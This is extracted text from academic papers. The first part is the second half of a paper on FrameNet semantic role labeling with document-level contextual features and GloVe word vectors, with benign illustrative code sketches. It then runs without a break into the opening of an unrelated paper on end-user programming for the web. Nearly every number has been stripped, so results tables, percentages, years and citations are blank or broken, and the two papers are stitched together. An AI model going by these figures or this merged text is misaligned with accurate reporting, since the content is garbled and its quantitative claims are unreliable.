; dinu and lapata, , in- ter alia) using sentence-level information which is already available in traditional srl systems in the form of explicit features. here, we go one step fur- ther and define a simple model in which word mean- ing representations are adapted to each document. as a starting point, we use the glove toolkit (pen- nington et al., ) for learning representations and apply it to the wikipedia corpus made available by the westbury lab. the learned representations can be seen as word vectors whose components en- code basic bits of related encyclopaedic knowledge. 
we adapt these general representations to the actual meaning of a word in a particular text by running additional iterations of the glove toolkit using document-specific co-occurrences as input and wikipedia-based representations for initialization. to make up for the large difference in data size between the wikipedia corpus and a single document, we normalize co-occurrence counts based on the ratio between the absolute numbers of co-occurrences in both resources. given co-occurrence matrices $c_{\text{wiki}}$ and $c_d$, and the vocabulary $v$, we formally define the features of our srl model as the components of the vector space $\vec{w}_i$ of words $w_i$ ($1 \le i \le |v|$) occurring in document $d$. the representations are learned by applying glove to optimize the following objective for $n$ iterations ($1 \le t \le n$):
$$j_t = \sum_{i,j} f(x_{ij})\,\bigl(\vec{w}_i^{\top}\vec{w}_j - \log x_{ij}\bigr)^2, \quad\text{where}\quad x = \begin{cases} c_{\text{wiki}} & \text{if } t < t_d \\ c_d & \text{otherwise} \end{cases}$$
the weighting function $f$ scales the impact of each word pair such that unseen pairs do not contribute to the overall objective and frequent co-occurrences are not overweighted. in our experiments, we use the same weighting function and parametrization as defined in pennington et al. ( ). we further set the number of iterations to be performed on each co-occurrence matrix following results of an initial cross-validation experiment on our training data (td = , n = ).
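the adaptation step just described can be emulated without the original toolkit: fit vectors on the large corpus co-occurrences first, then continue the same optimization on the rescaled document counts. the sketch below is a simplified illustration of that idea using plain numpy gradient steps rather than the actual glove implementation; matrix contents, dimensions, learning rate and epoch counts are placeholders.

```python
import numpy as np

def glove_weight(x, x_max=100.0, alpha=0.75):
    # standard glove-style weighting: down-weights rare pairs, caps frequent ones
    return np.where(x < x_max, (x / x_max) ** alpha, 1.0)

def fit(cooc, vecs, epochs, lr=0.05):
    """sgd-style updates of j = sum_ij f(x_ij) (w_i . w_j - log x_ij)^2."""
    rows, cols = np.nonzero(cooc)
    for _ in range(epochs):
        for i, j in zip(rows, cols):
            x = cooc[i, j]
            diff = vecs[i] @ vecs[j] - np.log(x)
            grad = 2.0 * glove_weight(x) * diff
            step_i = lr * grad * vecs[j]
            step_j = lr * grad * vecs[i]
            vecs[i] -= step_i
            vecs[j] -= step_j
    return vecs

rng = np.random.default_rng(0)
vocab_size, dim = 50, 10
c_wiki = rng.poisson(2.0, (vocab_size, vocab_size)).astype(float)  # placeholder corpus counts
c_doc = rng.poisson(0.5, (vocab_size, vocab_size)).astype(float)   # placeholder document counts

# rescale document counts so the two matrices are on a comparable scale
c_doc *= c_wiki.sum() / max(c_doc.sum(), 1.0)

vecs = rng.normal(scale=0.1, size=(vocab_size, dim))
vecs = fit(c_wiki, vecs, epochs=3)             # phase 1: corpus-level vectors
doc_vecs = fit(c_doc, vecs.copy(), epochs=2)   # phase 2: adapt to one document
```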
discourse newness our third contextual feature type is based on the observation that the salience of a discourse entity and its semantic prominence are interrelated. previ- ous work (rose, ) showed that semantic promi- nence, as signal-led by semantic roles, can better explain subsequent phenomena related to discourse salience (such as pronominalization) than syntactic indicators. our question here is whether this insight can be also applied in reverse. can information on discourse salience be useful as an indicator for se- mantic roles? for this feature, we make use of the same coref- erence chains as predicted for determining co- occurring roles. unfortunately, automatically pre- dicted mentions and coreference chains are noisy. to identify particularly reliable indicators for dis- course salience, we inspected held-out development data. one such indicator is whether an entity is men- tioned for the first time (discourse-new) or has been mentioned before (discourse-old). let w denote an entity and r ...rn the set of all co-reference chains with mentions r ...rm ∈ ri ( ≤ i ≤ n) ordered by their appearance in text. we define discourse newness based on head words r.head as: ( )new(w) = { if ∃rj ∈ ri : j > ∧rj.head ≡ w else although this feature is a simple binary indicator, it can be very useful for distinguishing between roles that are more or less likely to be assigned to new frame frame element new/old statement speaker . message . medium . leadership leader . governed . intensionally create creator . created entity . table : frequent frames that have elements with differ- ent likelihoods of discourse-new vs. discourse-old fillers; new/old ratios as observed on the development set. entities. for example, it is easy to imagine that the result of a causation is more likely to be discourse-new than the effect that caused it. ta- ble provides an overview of frames found in the training and development data which have roles with substantially different likelihoods for discourse-new fillers. . frame-based reranking our goal is to learn a better model for framenet- based semantic role labeling using linguistically in- spired features such as those described in the previ- ous sections. to do this, we need a framework for representing single role assignments and a model of how such assignments depend on each other within a frame instance. inspired by previous work on reranking in srl, we assume that we can find the correct filler of a frame element based on the top k roles predicted for each candidate word sequence. we leverage this assumption to train a reranking model that considers the top predictions for each candidate and uses all relevant features to select the best overall structure. our implementation of the reranking model is an adaptation of the reranker made available in the mate-tools (see section ), which we extend to deal with frame-specific features and arbitrary role la- bels. as features for the global component, we apply all local features and additionally use the following two types of indicator features on the whole frame structure: • total number of roles in the predicted structure • ordered set of predicted role labels frames srl model p r f gold semafor . . . ∗ gold framat . . . ∗ gold framat+context . . . semafor semafor . . . ∗ semafor framat . . . ∗ semafor framat+context . . . table : full structure prediction results using gold (top) and predicted frames (bottom). all numbers are per- centages. ∗ significantly different (p< . ) from framat+context. 
at test time, the reranker takes as input the n-best la- bels for the m-best fillers of a frame structure, com- putes a global score for each of the n × m possible combinations and returns the structure with the high- est overall score as its prediction output. based on initial experiments on our training data, we set these parameters to m = and n = . experiments in this section, we demonstrate the usefulness of contextual features for framenet-based srl mod- els. our hypothesis is that contextual information can considerably improve an existing semantic role labeling system. accordingly, we test this hypothe- sis based on the output of three different systems. the first system, henceforth called framat (short for framenet-adapted mate-tools) is the baseline system described in section . the second sys- tem, henceforth framat+context, is an enhanced ver- sion of the baseline that additionally uses all exten- sions described in section . finally, we also con- sider the output of semafor (das et al., ), a state-of-the-art model for frame-semantic role label- ing. although all systems are provided with entire documents as input, semafor and framat pro- cess each document sentence-by-sentence whereas framat+context also uses features over all sentences. for evaluation, we use the same framenet train- ing and evaluation texts as established in das and smith ( ). we compute precision, recall and f -score using the modified semeval- scorer from the semafor website. http://www.ark.cs.cmu.edu/semafor/eval/ results produced by running semafor on the exact same model/added feature p r f framat w/o reranker . . . +discourse newness . . . +word meaning vectors . . . +cooccurring roles . . . +reranker . . . +frame structure . . . table : full structure prediction results using gold frames, framat and different sets of context features. all numbers are percentages. results table summarizes our results with fra- mat, framat+context, and semafor using gold and predicted frames (see the upper and lower half of the table, respectively). although differences in system architecture lead to different precision/recall trade-offs for framat and semafor, both sys- tems achieve comparable f (for both gold and pre- dicted frames). compared to framat, we can see that the contextual enhancements implemented in our framat+context model lead to immediate gains of . points in recall, corresponding to a signifi- cant increase of . points in f . framat+context’s re- call is slightly below that of semafor ( . % vs. . %), however, it achieves a much higher level of precision ( . % vs. . %). we examined whether differences in performance among the three systems are significant using an ap- proximate randomization test over sentences (yeh, ). semafor and framat perform signifi- cantly worse (p< . ) compared to framat+context both when gold and predicted frames are used. in the remainder of this section we discuss results based on gold frames, since the focus of this work lies primar- ily on the role labeling task. impact of individual features we demonstrate the effect of adding individual context-based fea- tures to the framat model in a separate experiment. whereas all models in the previous experiment used a reranker for direct comparability, here we start with the framat baseline (without a reranker) and add each enhancement described in section in- crementally. as summarized in table , the base- line without a reranker achieves a precision and frame instances for training and testing as our own models. 
http://www.ark.cs.cmu.edu/semafor/eval/ recall of . % and . %, respectively. addi- tion of our discourse new feature increases pre- cision (+ . %), but also reduces recall (− . %). adding word meaning vectors compensates for the loss in recall (+ . %) and further increases preci- sion (+ . %). information about role assignments to coreferring mentions increases recall (+ . %) while retaining the same level of precision. finally, we can see that jointly considering role labeling decisions in a global reranker with additional fea- tures on frame structure leads to the strongest boost in performance, with combined additional gains in precision and recall of + . % and + . %, respec- tively. interestingly, the gains realized here are much higher compared to when adding the reranker to the framat model without contextual features, which corresponds to a + . % increase in precision but a − . % reduction in recall. general vs. document-specific vectors we also assessed the impact of adapting vectors to docu- ments (see table ). specifically, we compared a version of the framat+context model without any vectors against a model using the adaptation tech- nique presented in section . and a simpler alterna- tive which obtains glove representations trained on the wikipedia corpus and framenet texts. the lat- ter model does not explicitly take document infor- mation into account, but it should be able to yield vectors representative of the framenet domains, merely by being trained on them. as shown in ta- ble , our adaptation technique is superior to learn- ing word representations based on wikipedia and all framenet texts at once. using the components of document-specific vectors as features improves precision and recall by + . percentage points over framat+context without vectors. word representations trained on wikipedia and framenet improve preci- sion by + . percentage points and recall by + . . qualitative improvements in addition to quanti- tative gains, we also observe qualitative improve- ments when considering contextual features. a set of example predictions by different models are listed in table . the annotations show that framat and semafor mislabel several cases that are correctly classified by framat+context. in the first example, only framat+context is able to predict that on dec. fills the frame element model/word representations p r f framat+context without vectors . . . +document-specific vectors . . . +general (wiki+fn) vectors . . . table : full structure prediction results using gold frames, framat+context and different vector representa- tions. all numbers are percentages. time. this may seem trivial at first glance but is actually remarkable as the word token dec neither occurs in the training data nor is well represented as a time expression in wikipedia. the only way the model is able to label this phrase correctly is by finding that corresponding word tokens are sim- ilarly distributed across the test document as other time expressions are in the training data. in the second and third examples, correct assignments re- quire some form of world knowledge which is not expressed within the respective sentences but might be approximated based on context. for example, knowing that aunt, uncle and grandmother are role fillers of a kinship frame means that they are of the semantic type human and thus only compatible with the frame element recipient, not with goal. 
similarly, correctly classifying the relation between clinton and stooge in the last example is only possi- ble if the model has access to some information that makes clinton a likely filler of the superior role. we conjecture that document-specific word vector representations provide such information given that clinton co-occurs in the document with words such as president, chief, and claim. overall, we find that the features introduced in section model a fair amount of contextual in- formation which can help a semantic role labeling model to perform better decisions. discussion in this section, we discuss the extent to which our model leverages the full potential of contextual fea- tures for semantic role labeling. we manually ex- amine role assignments to frame elements which seem particularly sensitive to context. we analyze such frame elements based on differences in label assignment between framat and framat+context that can be traced back to factors such as agency in dis- semafor *can [he]theme gomotion [to paris]goal on dec. ? framat *can [he]theme gomotion [to paris on dec. ]goal ? framat+context can [he]theme gomotion [to paris]goal [on dec. ]time ? semafor *sendsending [my regards]theme to my aunt , uncle and grandmother . framat *sendsending [my regards]theme [to my aunt , uncle and grandmother]goal . framat+context sendsending [my regards]theme [to my aunt , uncle and grandmother]recipient . semafor *stephanopoulos does n’t want to seem a clinton stoogesubordinates and superiors framat *stephanopoulos doesn’t want to seem a [clinton]descriptor stoogesubordinates and superiors framat+context stephanopoulos does n’t want to seem a [clinton]superior stoogesubordinates and superiors table : examples of frame structures that are labeled incorrectly (marked by asterisks) without contextual features. course and word sense in context. we investigate whether our model captures these factors success- fully and showcase examples while reporting abso- lute changes in precision and recall. . agency and discourse many frame elements in framenet indicate agency, a property that we expect to highly correlate with contextual features on semantic types of assigned roles (see section . ) and discourse salience (see section . ). analysis of system output revealed that such features indeed affect and generally im- prove role labeling. considering all agent ele- ments across frames, we observe absolute improve- ments of % in precision and % in recall. in the fol- lowing, we provide a more detailed analysis of two specific frame elements: the low frequent agent element of the project frame and the highly fre- quent speaker element in the statement frame. the agent of a project is defined as the “individual or organization that carries out the project”. the main difficulty in identifying in- stances of this frame element is that the frame- evoking target word is typically a noun such as project, plan, or program and hence syntactic fea- tures on word-word dependencies do not provide sufficient cues. we found several cases where con- text provided missing cues, leading to an increase in recall from % to %. in cases where addi- tional features did not help, we identified two types of errors: firstly, the filler was too far from the tar- get word and therefore could not be identified as a filler at all (“[north korea]agent is developing ... programproject ”), and secondly, earlier men- tions indicating agency were not detected by the coreference resolution system (“the iaea assisted syria (...) 
this study was part of an iaeaagent .. programproject ). the speaker of a statement is defined as “the sentient entity that produces [a] message”. instances of the statement frame are frequently evoked by verbs such as say, mention, and claim. the speaker role can be hard to identify in sub- ject position as an unknown entity could also fill the medium role. for example, “a report claims that ...” should be analyzed differently from “a person claims”. our contextual features improve role label- ing in cases where the subject can be classified based on previous role assignments. on the negative side, we found our model to be too conservative in some cases where a subject is discourse new. additional gains would be possible with improved coreference chains that include pronouns such as some and i. such chains could be established through a better preprocessing pipeline or by utilizing additional lin- guistic resources. . word meaning and context as discussed earlier, we expect that the meaning of a word in context provides valuable cues regarding potential frame elements. two types of words are of particular interest here: ambiguous words, for which different senses might apply depending on context, and out-of-vocabulary words, for which no clear sense could be established during training. in the following, we take a closer look at differences in role assignment between framat and framat+context for such fillers. ambiguous words that occur as fillers of differ- ent frame elements in the test set include party, power, program, and view. we find occurrences of these words in two broad types of contexts: po- litical and non-political. within political contexts, party and power fill frame elements such as pos- session and leader. outwith political contexts, we find frame elements such as electricity and social event to be far more likely. the framat model exhibits a general bias towards the political domain, often missing instances of frame elements that are more common in non-political contexts (e.g., “the six-[party]interlocutors talksdiscussion ”). framat+context, in contrast, shows less of a bias and provides better classification based on context fea- tures for all frame elements. overall, precision for the four ambiguous words is improved from % to %, with a few errors remaining due to rare depen- dency paths (e.g., [program]act nmod←−−− which sbar←−− is prd←−−violationcompliance ) and differences between frame elements that depend on factors such as num- ber (cognizer vs. cognizer ). a frequently observed error by the baseline model is to assign peripheral frame elements such as time to role fillers that actually are not time expressions. this happens because words which have not been seen frequently during training but appear in adverbial positions are generally likely to fill the frame element time. we find that the use of document-specific word vector representations drastically reduces the number of such errors (e.g., “to givegiving [generously]manner vs. *time ”), with absolute gains in precision and recall of % and %, respectively, presumably because non-time expressions are often distributed differently across a document than time expressions. document- specific word vector representations also improve recall for out-of-vocabulary words, as seen with the example of dec discussed in section . 
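to make the role of document-specific representations more concrete, the sketch below illustrates, under stated assumptions, how a vector for an out-of-vocabulary token such as dec could be derived from its occurrences in the test document and compared against a prototype built from known time fillers. the paper's actual adaptation technique is defined in an earlier section not shown here, so the mixing scheme and every identifier (documentVector, timeSimilarityFeature, the window and mix parameters) are illustrative assumptions rather than the released mateplus implementation.

```typescript
// illustrative only: a word's document-specific vector is taken to be a mix of
// its general embedding and the centroid of the words surrounding its
// occurrences in the current document; the mix is then compared with a
// frame-element prototype. all names and the 50/50 mixing are assumptions.
type Vec = number[];

const add = (a: Vec, b: Vec): Vec => a.map((x, i) => x + b[i]);
const scale = (a: Vec, s: number): Vec => a.map(x => x * s);
const dot = (a: Vec, b: Vec): number => a.reduce((s, x, i) => s + x * b[i], 0);
const cosine = (a: Vec, b: Vec): number =>
  dot(a, b) / (Math.sqrt(dot(a, a) * dot(b, b)) || 1);

function documentVector(
  word: string,
  docTokens: string[],
  general: Map<string, Vec>,   // pretrained (e.g., glove-style) embeddings
  dim: number,
  window = 5,
  mix = 0.5
): Vec {
  // centroid of the general vectors of words co-occurring with `word` in the document
  let context: Vec = new Array(dim).fill(0);
  let seen = 0;
  docTokens.forEach((tok, i) => {
    if (tok !== word) return;
    for (let j = Math.max(0, i - window); j <= Math.min(docTokens.length - 1, i + window); j++) {
      const v = general.get(docTokens[j]);
      if (j !== i && v) { context = add(context, v); seen++; }
    }
  });
  if (seen > 0) context = scale(context, 1 / seen);
  const base = general.get(word) ?? new Array(dim).fill(0); // zero vector for oov words
  return add(scale(base, mix), scale(context, 1 - mix));
}

// feature value: how similar is the candidate filler to known time fillers?
function timeSimilarityFeature(
  candidate: string,
  docTokens: string[],
  general: Map<string, Vec>,
  timePrototype: Vec
): number {
  return cosine(documentVector(candidate, docTokens, general, timePrototype.length), timePrototype);
}
```

a feature along these lines would fire for dec. whenever its in-document neighbours resemble those of training-time time expressions, which is exactly the behaviour described above.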
however, such representations by themselves might be insuf- ficient to determine which aspects of a word sense are applicable across a document as occurrences in specific contexts may also be misleading (e.g., “. . . changes [throughout the community]” vs. “... [throughout the ages]time ”). some of these cases could be resolved using higher level features that explicitly model interactions between (predicted) word meaning in context and other factors, however we leave this to future work. conclusions in this paper, we enriched a traditional semantic role labeling model with additional information from context. the corresponding features we defined can be grouped into three categories: ( ) discourse-level features that directly utilize discourse knowledge in the form of coreference chains (newness, prior role assignments), ( ) sentence-level features that model properties of a frame structure as a whole, and ( ) lexical features that can be computed using methods from distributional semantics and an adaptation to model document-specific word meaning. to implement our discourse-level enhancements, we modified a semantic role labeling system de- veloped for propbank/nombank which we found to achieve competitive performance on framenet- based annotations. our main contribution lies in extending this system to the discourse level. our experiments revealed that discourse aware features can significantly improve semantic role labeling per- formance, leading to gains of over + . percent- age points in precision and state-of-the-art results in terms of f . analysis of system output revealed two reasons for improvement. firstly, contextual features provide necessary additional information to understand and assign roles on the sentence level, and secondly, some of our discourse-level features generalize better than traditional lexical and syntac- tic features. we further found that additional gains can be achieved using improved preprocessing tools and a more sophisticated model for feature inter- actions. in the future, we are planning to assess whether discourse-level features generalize cross- linguistically. we would also like to investigate whether semantic role labeling can benefit from rec- ognizing textual entailment and high-level discourse relations. our code is publicly available under http://github.com/microth/mateplus. acknowledgements we are grateful to diana mccarthy and three anony- mous referees whose feedback helped to substan- tially improve the present paper. the research pre- sented in this paper was funded by a dfg research fellowship (ro / - ). http://github.com/microth/mateplus references apoorv agarwal, sriramkumar balasubramanian, anup kotalwar, jiehan zheng, and owen rambow. . frame semantic tree kernels for social network extrac- tion from text. in proceedings of the th confer- ence of the european chapter of the association for computational linguistics, pages – , gothen- burg, sweden, – april . anders björkelund, bernd bohnet, love hafdell, and pierre nugues. . a high-performance syntac- tic and semantic dependency parser. in coling : demonstration volume, pages – , beijing, china. wanxiang che, ting liu, and yongqiang li. . im- proving semantic role labeling with word sense. in human language technologies: the annual conference of the north american chapter of the as- sociation for computational linguistics, pages – , los angeles, california, – june . bob coyne, alex klapheke, masoud rouhizadeh, richard sproat, and daniel bauer. . 
annotation tools and knowledge representation for a text-to-scene system. in proceedings of th international con- ference on computational linguistics, pages – , mumbai, india, – december . danilo croce, cristina giannone, paolo annesi, and roberto basili. . towards open-domain semantic role labeling. in proceedings of the th annual meet- ing of the association for computational linguistics, pages – , uppsala, sweden, – july . danilo croce, alessandro moschitti, and roberto basili. . structured lexical similarity via convolution kernels on dependency trees. in proceedings of the conference on empirical methods in natural language processing, pages – , edinburgh, united kingdom. dipanjan das and noah a. smith. . semi- supervised frame-semantic parsing for unknown pred- icates. in proceedings of the th annual meeting of the association for computational linguistics: hu- man language technologies, portland, oregon, – june . dipanjan das, desai chen, andré f. t. martins, nathan schneider, and noah a. smith. . frame-semantic parsing. computational linguistics, ( ): – . koen deschacht and marie-francine moens. . semi-supervised semantic role labeling using the la- tent words language model. in proceedings of the conference on empirical methods in natural language processing, pages – , singapore, – august . georgiana dinu and mirella lapata. . measuring distributional similarity in context. in proceedings of the conference on empirical methods in natural language processing, pages – , cambridge, massachusetts, – october . charles j. fillmore. . frame semantics and the na- ture of language. in annals of the new york academy of sciences: conference on the origin and develop- ment of language and speech, volume , pages – . william foland and james martin. . dependency- based semantic role labeling using convolutional neu- ral networks. in proceedings of the fourth joint conference on lexical and computational semantics, pages – , denver, colorado. matthew gerber and joyce chai. . semantic role labeling of implicit arguments for nominal predi- cates. computational linguistics, ( ): – . daniel gildea and daniel jurafsky. . automatic la- beling of semantic roles. computational linguistics, ( ): – . philip gorinski, josef ruppenhofer, and caroline sporleder. . towards weakly supervised resolu- tion of null instantiations. in proceedings of the th international conference on computational semantics (iwcs ) – long papers, pages – , potsdam, germany, – march . karl moritz hermann, dipanjan das, jason weston, and kuzman ganchev. . semantic frame identifica- tion with distributed word representations. in pro- ceedings of the nd annual meeting of the associa- tion for computational linguistics, pages – , baltimore, maryland, – june . fei huang and alexander yates. . open-domain semantic role labeling by modeling word spans. in proceedings of the th annual meeting of the associ- ation for computational linguistics, pages – , uppsala, sweden, – july . richard johansson and pierre nugues. . the ef- fect of syntactic representation on semantic role label- ing. in proceedings of the nd international con- ference on computational linguistics, pages – , manchester, united kingdom, – august . egoitz laparra and german rigau. . sources of ev- idence for implicit argument resolution. in proceed- ings of the th international conference on compu- tational semantics (iwcs ) – long papers, pages – , potsdam, germany, – march . heeyoung lee, angel chang, yves peirsman, nathanael chambers, mihai surdeanu, and dan jurafsky. . 
deterministic coreference resolution based on entity- centric, precision-ranked rules. computational lin- guistics, ( ): – . tao lei, yuan zhang, lluı́s màrquez, alessandro mos- chitti, and regina barzilay. . high-order low- rank tensors for semantic role labeling. in proceedings of the conference of the north american chapter of the association for computational linguistics: hu- man language technologies, pages – , den- ver, colorado. tomas mikolov, wen-tau yih, and geoffrey zweig. . linguistic regularities in continuous space word representations. in proceedings of the confer- ence of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – , atlanta, georgia, – june . alessandro moschitti. . a study on convolution kernels for shallow statistic parsing. in proceedings of the nd meeting of the association for computa- tional linguistics (acl’ ), main volume, pages – , barcelona, spain. sebastian padó, marco pennacchiotti, and caroline sporleder. . semantic role assignment for event nominalisations by leveraging verbal data. in pro- ceedings of the nd international conference on computational linguistics (coling ), pages – , manchester, united kingdom. marco pennacchiotti, diego de cao, roberto basili, danilo croce, and michael roth. . automatic induction of framenet lexical units. in proceedings of the conference on empirical methods in nat- ural language processing, pages – , honolulu, hawaii, usa, – october . jeffrey pennington, richard socher, and christopher manning. . glove: global vectors for word rep- resentation. in proceedings of the conference on empirical methods in natural language processing, pages – , doha, qatar, – october . ralph l rose. . joint information value of syntactic and semantic prominence for subsequent pronominal reference. salience: multidisciplinary perspectives on its function in discourse, : – . michael roth and kristian woodsend. . compo- sition of word representations improves semantic role labelling. in proceedings of the conference on empirical methods in natural language processing, pages – , doha, qatar, – october . josef ruppenhofer, michael ellsworth, miriam r. l. petruck, christopher r. johnson, and jan scheffczyk. . framenet ii: extended theory and practice. technical report, international computer science in- stitute, september . josef ruppenhofer, philip gorinski, and caroline sporleder. . in search of missing arguments: a linguistic approach. in proceedings of the inter- national conference recent advances in natural lan- guage processing , pages – , hissar, bul- garia, – september . magnus sahlgren. . the distributional hypothesis. italian journal of linguistics, ( ): – . dan shen and mirella lapata. . using semantic roles to improve question answering. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning (emnlp-conll), pages – , prague, czech republic. carina silberer and anette frank. . casting implicit role linking as an anaphora resolution task. in pro- ceedings of the first joint conference on lexical and computational semantics (*sem ), pages – , montréal, canada, - june. oscar täckström, kuzman ganchev, and dipanjan das. . efficient inference and structured learning for semantic role labeling. transactions of the associa- tion for computational linguistics, : – . stefan thater, hagen fürstenau, and manfred pinkal. . 
contextualizing semantic representations us- ing syntactically enriched vector models. in proceed- ings of the th annual meeting of the association for computational linguistics, pages – , uppsala, sweden, – july . kristina toutanova, aria haghighi, and christopher manning. . joint learning improves semantic role labeling. in proceedings of the rd annual meet- ing of the association for computational linguistics, pages – , ann arbor, michigan, – june . boyi xie, rebecca j. passonneau, leon wu, and germán g. creamer. . semantic frames to pre- dict stock price movement. in proceedings of the st annual meeting of the association for computational linguistics, pages – , sofia, bulgaria, – au- gust . nianwen xue and martha palmer. . calibrating features for semantic role labeling. in proceedings of the conference on empirical methods in natural language processing, pages – , barcelona, spain, july. alexander yeh. . more accurate tests for the sta- tistical significance of result differences. in proceed- ings of the th international conference on computa- tional linguistics, pages – , saarbrücken, ger- many. beñat zapirain, eneko agirre, lluı́s màrquez, and mi- hai surdeanu. . selectional preferences for se- mantic role classification. computational linguistics, ( ): – . submitted april accepted september published november corresponding author tak yeon lee, tylee@umd.edu academic editor harry hochheiser additional information and declarations can be found on page doi . /peerj-cs. copyright lee and bederson distributed under creative commons cc-by . open access give the people what they want: studying end-user needs for enhancing the web tak yeon lee and benjamin b. bederson human-computer interaction lab, computer science, university of maryland, college park, md, united states abstract end-user programming (eup) is a common approach for helping ordinary people create small programs for their professional or daily tasks. since end-users may not have programming skills or strong motivation for learning them, tools should provide what end-users want with minimal costs of learning –i.e., they must decrease the barriers to entry. however, it is often hard to address these needs, especially for fast-evolving domains such as the web. to better understand these existing and ongoing challenges, we conducted two formative studies with web users –a semi-structured interview study, and a wizard-of-oz study. the interview study identifies challenges that participants have with their daily experiences on the web. the wizard-of-oz study investigates how participants would naturally explain three computational tasks to an interviewer acting as a hypothetical computer agent. these studies demonstrate a disconnect between what end-users want and what existing eup systems support, and thus open the door for a path towards better support for end user needs. in particular, our findings include: ( ) analysis of challenges that end-users experience on the web with solutions; ( ) seven core functionalities of eup for addressing these challenges; ( ) characteristics of non- programmers describing three common computation tasks; ( ) design implications for future eup systems. subjects human–computer interaction keywords end-user programming, user study, wizard-of-oz study, world-wide web introduction over the decades, the web has become the most popular and convenient workbench for individuals and businesses supporting an incredible number of activities. 
however, developers of web services cannot completely anticipate future uses and problems at design time, when a service is developed. thus we can expect users, at use time, will discover misalignment between their needs and the support that an existing system can provide for them (fischer & giaccardi, ). numerous examples of this misalignment exist. for example, a site designed to support comparison-shopping for online shoppers may not meet the needs of shoppers who want to compare prices across different sites and even track daily prices (http://camelcamelcamel.com). another is that people often use customizable applications (e.g., rss feed readers) to manage ever-growing channels instead of visiting individual sites. more broadly, fraudulent sites and deceptive opinion spam are ongoing concerns for consumers (ott, cardie & hancock, ). when a web page does not match their needs, people often use mashups how to cite this article lee and bederson ( ), give the people what they want: studying end-user needs for enhancing the web. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:tylee@umd.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://camelcamelcamel.com http://dx.doi.org/ . /peerj-cs. (ennals et al., ; wong & hong, ; zang, rosson & nasser, ; zang & rosson, a; zang & rosson, b), browser extensions and scripts (bolin et al., ; leshed et al., ; miller et al., ; https://addons.mozilla.org/en-us/firefox/addon/ greasemonkey/) built by third-party programmers. unfortunately there are not enough third-party solutions to address all . billion end-user’s needs of million websites (toomim et al., ), and enabling end users to develop their own solutions is the goal of end-user programming on the web (webeup). a clear understanding of end-user needs is essential for building successful programming tools (rosson, ballin & rode, ). in this paper we report two user studies that address the following related research questions: ( ) what do end-users want to do; and ( ) how can we make programming tools easy for end-users without programming knowledge? answering these two questions is important to have a clearer understanding of the direction we should take to develop webeup systems that will be useful and effective for a broad range of people. prior studies (zang, rosson & nasser, ; zang & rosson, ; zang & rosson, b) characterize potential end-user programmer’s mindset and needs. researchers also investigated end-user programmer’s real world behavior and software artifacts they created with specific webeup tools such as coscripter (bogart et al., ). live collections such as the chrome web store (https://chrome.google.com/webstore/category/apps) and programmableweb (http://www.programmableweb.com/) are valuable resources that address user needs by community developed scripts and mashups. this paper reports on an interview study with similar motivations—to investigate what challenges end-users experience and how they would improve—but focuses on unmet needs of end-users on the web with minimal bias of current technology. through iterative coding we identify the pattern of challenges that end-users experience. we also suggest seven functionalities of eup for addressing the challenges—modify, compute, interactivity, gather, automate, store, and notify. 
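to make the kind of artifact discussed here concrete before turning to related work, the sketch below shows what a minimal greasemonkey-style enhancement might look like: a user script that hides promotional clutter on a hypothetical shopping site. the site, selectors, and script name are invented for illustration, and the snippet is written in typescript (real user scripts are plain javascript) purely for consistency with the other sketches in this article.

```typescript
// ==UserScript==
// @name     hide-promotions (illustrative)
// @match    https://shop.example.com/*
// ==/UserScript==
//
// a minimal user-script-style enhancement: hide promotional side bars and
// sponsored list items on a hypothetical shopping site. selectors are made up.
function hidePromotions(): void {
  const selectors = [".sidebar-promo", ".sponsored-item", "div[data-ad]"];
  for (const sel of selectors) {
    document.querySelectorAll<HTMLElement>(sel).forEach(el => {
      el.style.display = "none"; // hide rather than delete, so the change can be undone
    });
  }
}

hidePromotions();
// re-apply whenever the page loads more content dynamically
new MutationObserver(hidePromotions).observe(document.body, { childList: true, subtree: true });
```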
there is a wealth of study for the second question—how to make webeup tools natural and easy to learn. researchers have studied the psychology of non-programmers. miller ( ) and miller ( ) examined natural language descriptions by non-programmers and identified a rich set of characteristics such as contextual referencing. biermann, ballard & sigmon ( ) confirmed that there are numerous regularities in the way non-programmers describe programs. pane, myers & ratanamahatana ( ) identified vocabulary and structure in non-programmer’s description of programs. we conducted a wizard-of- oz study with non-programmers to observe how they naturally explain common computational tasks through conversational dialogue with an intelligent agent. the interviewer acted as a hypothetical computer agent, who understands participant’s verbal statements, gestures, and scribbles. this study expands existing work with characteristics of non-programmers mental models. findings from the interviews and the wizard-of-oz study together demonstrate a disconnect between what end-users need from eup and what current systems support. in addition to identifying a set of important functionalities that should be included to best support end-users, our findings specifically highlight the needs of social platforms for lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/ https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/ https://chrome.google.com/webstore/category/apps http://www.programmableweb.com/ http://dx.doi.org/ . /peerj-cs. solving complex problems, and interactivity of programs created with eup tools to alleviate end-user’s concerns about using third-party programs. the wizard-of-oz study also shows that future eup tools should support multi-modal and mixed-initiative interaction for making programming more natural and easy-to-use. this paper makes the following contributions: ( ) identifying the current needs of end-user programming on the web; ( ) proposing features of future eup systems for addressing the needs of users on the web; ( ) characterizing non-programmer’s mental model of describing programming tasks; and ( ) proposing implications for designing end-user programming interfaces. related work end-user programming on the web over the last decade, researchers and companies have developed a large number of eup systems for the web (webeup). those webeup tools commonly took a combination of three approaches: scripting, visual programming, and inductive programming including programming-by-demonstration (cypher et al., ) and programming-by-example (lieberman, ). first, scripting languages for webeup (bolin et al., ; leshed et al., ; https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/) offer natural and domain-specific commands instead of machine-oriented general-purpose syntax of traditional languages such as c or java. however, end-users of script languages still need to memorize commands and type accurate details. in order to make programming more accessible to users without programming expertise, eup systems often employ visual programming techniques including drag-and-drop for organizing graphical widgets of operations, and flowcharts showing program structure (wong & hong, ; cameron & churchill, ). while visual programming techniques make programming more intuitive, they are usually less expressive and scalable than scripting languages. 
